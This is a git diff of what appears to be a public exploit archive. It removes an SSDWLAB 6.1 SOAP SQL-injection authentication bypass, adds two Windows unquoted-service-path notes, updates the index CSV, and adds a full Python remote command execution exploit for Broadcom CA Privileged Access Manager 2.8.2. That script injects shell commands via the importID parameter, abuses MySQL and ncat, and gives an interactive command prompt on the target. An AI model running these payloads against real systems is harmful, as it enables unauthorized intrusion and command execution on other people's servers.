diff --git a/exploits/aspx/webapps/47742.txt b/exploits/aspx/webapps/47742.txt
deleted file mode 100644
index 1e3dfa242..000000000
--- a/exploits/aspx/webapps/47742.txt
+++ /dev/null
@@ -1,76 +0,0 @@
-# Exploit Title: SSDWLAB 6.1 - Authentication Bypass
-# Date: 2019-10-01
-# Exploit Author: Luis Buendía (exoticpayloads)
-# Vendor Homepage: http://www.sbpsoftware.com/
-# Version: 6.1
-# Tested on: IIS 7.5
-# CVE : Pending
-#Description: By injection on the SOAP function in the EditUserPassword function, it is possible to create a "fake" user and authenticate with it.
-
-Request to the EditUserPassword Function
-
-POST /PATH-TO-WEB-SERVICE/WebService.asmx HTTP/1.1
-Host: XXXXXXX.com
-Content-Type: text/xml; charset=utf-8
-Content-Length: 462
-SOAPAction: "http://tempuri.org/EditUserPassword"
-
-
-
-
-
- ' or 1=1 --
- string
- string
- ENG
-
-
-
-
-Example of Response when injection is succesfull
-
-HTTP/1.1 200 OK
-Cache-Control: private, max-age=0
-Content-Type: text/xml; charset=utf-8
-X-AspNet-Version: 4.0.30319
-X-Powered-By: XXX.XXX
-Content-Length: 421
-
-0
-
-Request to Login After Successful Request
-
-POST /PATH-TO-WEB-SERVICE/WebService.asmx HTTP/1.1
-Host: XXXXXXX.com
-User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
-Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
-Accept-Language: en-US,en;q=0.5
-Accept-Encoding: gzip, deflate
-Connection: close
-Referer: https://XXXXXXX.com/PATH-TO-WEB-SERVICE/main.swf/[[DYNAMIC]]/2
-Content-Type: text/xml; charset=utf-8
-SOAPAction: "http://tempuri.org/Login"
-Content-Length: 406
-
-
-
-
- ' or 1=1 --
- string
- ENG
-
-
-
-
-Example of succesfull login
-
-HTTP/1.1 200 OK
-Cache-Control: private, max-age=0
-Content-Type: text/xml; charset=utf-8
-Vary: Accept-Encoding
-X-AspNet-Version: 4.0.30319
-X-Powered-By: XXX.XXX
-Connection: close
-Content-Length: 422
-
-0d62cc3c0b2e3413cb8b4a85b0fa6177b
\ No newline at end of file
diff --git a/exploits/windows/local/47746.txt b/exploits/windows/local/47746.txt
new file mode 100644
index 000000000..27dedca39
--- /dev/null
+++ b/exploits/windows/local/47746.txt
@@ -0,0 +1,25 @@
+#Exploit Title: NETGATE Data Backup 3.0.620 - 'NGDatBckpSrv' Unquoted Service Path
+#Exploit Author : ZwX
+#Exploit Date: 2019-12-04
+#Vendor Homepage : http://www.netgate.sk/
+#Link Software : http://www.netgate.sk/download/download.php?id=5
+#Tested on OS: Windows 7
+
+
+#Analyze PoC :
+==============
+
+
+C:\Users\ZwX>sc qc NGDatBckpSrv
+[SC] QueryServiceConfig réussite(s)
+
+SERVICE_NAME: NGDatBckpSrv
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files\NETGATE\Data Backup\DataBackupSrv.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : NETGATE Data Backup Service
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/47747.txt b/exploits/windows/local/47747.txt
new file mode 100644
index 000000000..2a28e4cb3
--- /dev/null
+++ b/exploits/windows/local/47747.txt
@@ -0,0 +1,39 @@
+#Exploit Title: Amiti Antivirus 25.0.640 - Unquoted Service Path
+#Exploit Author : ZwX
+#Exploit Date: 2019-12-04
+#Vendor Homepage : http://www.netgate.sk/
+#Link Software : https://www.netgate.sk/download/download.php?id=11
+#Tested on OS: Windows 7
+
+
+#Analyze PoC :
+==============
+
+
+C:\Users\ZwX>sc qc ScsiAccess
+[SC] QueryServiceConfig réussite(s)
+
+SERVICE_NAME: AmitiAvHealth
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files\NETGATE\Amiti Antivirus\AmitiAntivirusHealth.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : Amiti Antivirus Health Check
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+C:\Users\ZwX>sc qc AmitiAvSrv
+[SC] QueryServiceConfig réussite(s)
+
+SERVICE_NAME: AmitiAvSrv
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files\NETGATE\Amiti Antivirus\AmitiAntivirusSrv.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : Amiti Antivirus Engine Service
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/webapps/47748.py b/exploits/windows/webapps/47748.py
new file mode 100755
index 000000000..ed8ed30af
--- /dev/null
+++ b/exploits/windows/webapps/47748.py
@@ -0,0 +1,71 @@
+# Title: Broadcom CA Privilged Access Manager 2.8.2 - Remote Command Execution
+# Author: Peter Lapp
+# Date: 2019-12-05
+# Vendor: https://techdocs.broadcom.com/us/product-content/recommended-reading/security-notices/ca20180614-01--security-notice-for-ca-privileged-access-manager.html
+# CVE: CVE-2018-9021 and CVE-2018-9022
+# Tested on: v2.8.2
+
+import urllib2
+import urllib
+import ssl
+import sys
+import json
+import base64
+
+
+ctx = ssl.create_default_context()
+ctx.check_hostname = False
+ctx.verify_mode = ssl.CERT_NONE
+
+
+def send_command(ip, cmd):
+ cmd = urllib.quote_plus(cmd)
+ url = 'https://'+ip+'/ajax_cmd.php?cmd=AD_IMPORT&command=add&groupId=123&importID=|'+cmd+'+2>%261||&deviceMode=test'
+ request = urllib2.Request(url, None)
+ response = urllib2.urlopen(request, context=ctx)
+ result = json.load(response)
+ return result['responseData']
+
+def get_db_value():
+ cmd = "echo select value from configuration_f where name = 'ssl_vpn_network' | mysql -u root uag"
+ db_value = send_command(ip,cmd)
+ db_value = db_value.split('\n')[1]
+ return db_value
+
+def encode_payload(cmd):
+ sql_string = "update configuration_f set value='\\';"+cmd+" > /tmp/output;\\'' where name='ssl_vpn_network'"
+ cmd = "echo "+base64.b64encode(sql_string)+" | base64 -d | mysql -u root uag "
+ return cmd
+
+def restore_sql(value):
+ sql_string = "update configuration_f set value='"+value+"' where name='ssl_vpn_network'"
+ cmd = "echo "+base64.b64encode(sql_string)+" | base64 -d | mysql -u root uag "
+ send_command(ip,cmd)
+
+def main():
+ print '''Xceedium Command Execution PoC by Peter Lapp(lappsec)'''
+
+ if len(sys.argv) != 2:
+ print "Usage: xceedium_rce.py "
+ sys.exit()
+
+ global ip
+ ip = sys.argv[1]
+ print 'Enter commands below. Type exit to quit'
+
+ while True:
+ cmd = raw_input('# ')
+ if cmd == "exit":
+ sys.exit()
+ orig_value = get_db_value()
+ payload = encode_payload(cmd)
+ send_command(ip, payload)
+ send_command(ip, 'echo -e openvpn\\n | ncat --send-only 127.0.0.1 2210')
+ output = send_command(ip, 'cat /tmp/output')
+ print output
+ restore_sql(orig_value)
+
+
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index a730dbf47..635523c9d 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -10825,6 +10825,8 @@ id,file,description,date,author,type,platform,port
47735,exploits/xml/local/47735.txt,"Microsoft Excel 2016 1901 - XML External Entity Injection",2019-12-02,hyp3rlinx,local,xml,
47740,exploits/xml/local/47740.txt,"Microsoft Windows Media Center 2002 - XML External Entity MotW Bypass",2019-12-03,hyp3rlinx,local,xml,
47743,exploits/xml/local/47743.txt,"Microsoft Visual Basic 2010 Express - XML External Entity Injection",2019-12-04,ZwX,local,xml,
+47746,exploits/windows/local/47746.txt,"NETGATE Data Backup 3.0.620 - 'NGDatBckpSrv' Unquoted Service Path",2019-12-05,ZwX,local,windows,
+47747,exploits/windows/local/47747.txt,"Amiti Antivirus 25.0.640 - Unquoted Service Path",2019-12-05,ZwX,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42053,6 +42055,6 @@ id,file,description,date,author,type,platform,port
47738,exploits/hardware/webapps/47738.txt,"Intelbras Router RF1200 1.1.3 - Cross-Site Request Forgery",2019-12-03,"Prof. Joas Antonio",webapps,hardware,80
47739,exploits/php/webapps/47739.php,"Revive Adserver 4.2 - Remote Code Execution",2019-12-03,crlf,webapps,php,
47741,exploits/php/webapps/47741.txt,"Online Clinic Management System 2.2 - HTML Injection",2019-12-04,"Cemal Cihad ÇİFTÇİ",webapps,php,
-47742,exploits/aspx/webapps/47742.txt,"SSDWLAB 6.1 - Authentication Bypass",2019-12-04,"Luis Buendía",webapps,aspx,
47744,exploits/hardware/webapps/47744.txt,"Cisco WLC 2504 8.9 - Denial of Service (PoC)",2019-12-04,SecuNinja,webapps,hardware,
47745,exploits/php/webapps/47745.txt,"OwnCloud 8.1.8 - Username Disclosure",2019-12-04,"Daniel Moreno",webapps,php,
+47748,exploits/windows/webapps/47748.py,"Broadcom CA Privilged Access Manager 2.8.2 - Remote Command Execution",2019-12-05,"Peter Lapp",webapps,windows,